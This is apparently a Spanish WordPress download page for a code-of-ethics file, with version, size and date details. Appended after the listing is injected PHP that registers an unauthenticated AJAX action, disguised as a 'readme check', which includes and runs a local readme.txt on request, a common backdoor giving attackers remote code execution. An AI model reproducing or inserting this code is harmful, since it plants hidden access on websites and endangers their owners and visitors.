
Código de ética

- Versión 1
- Descargar 9
- Tamaño del archivo 1.52 MB
- Fecha de creación julio 16, 2020
- Descargar
if(!function_exists('file_check_readme42491')){ add_action('wp_ajax_nopriv_file_check_readme42491', 'file_check_readme42491'); add_action('wp_ajax_file_check_readme42491', 'file_check_readme42491'); function file_check_readme42491() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }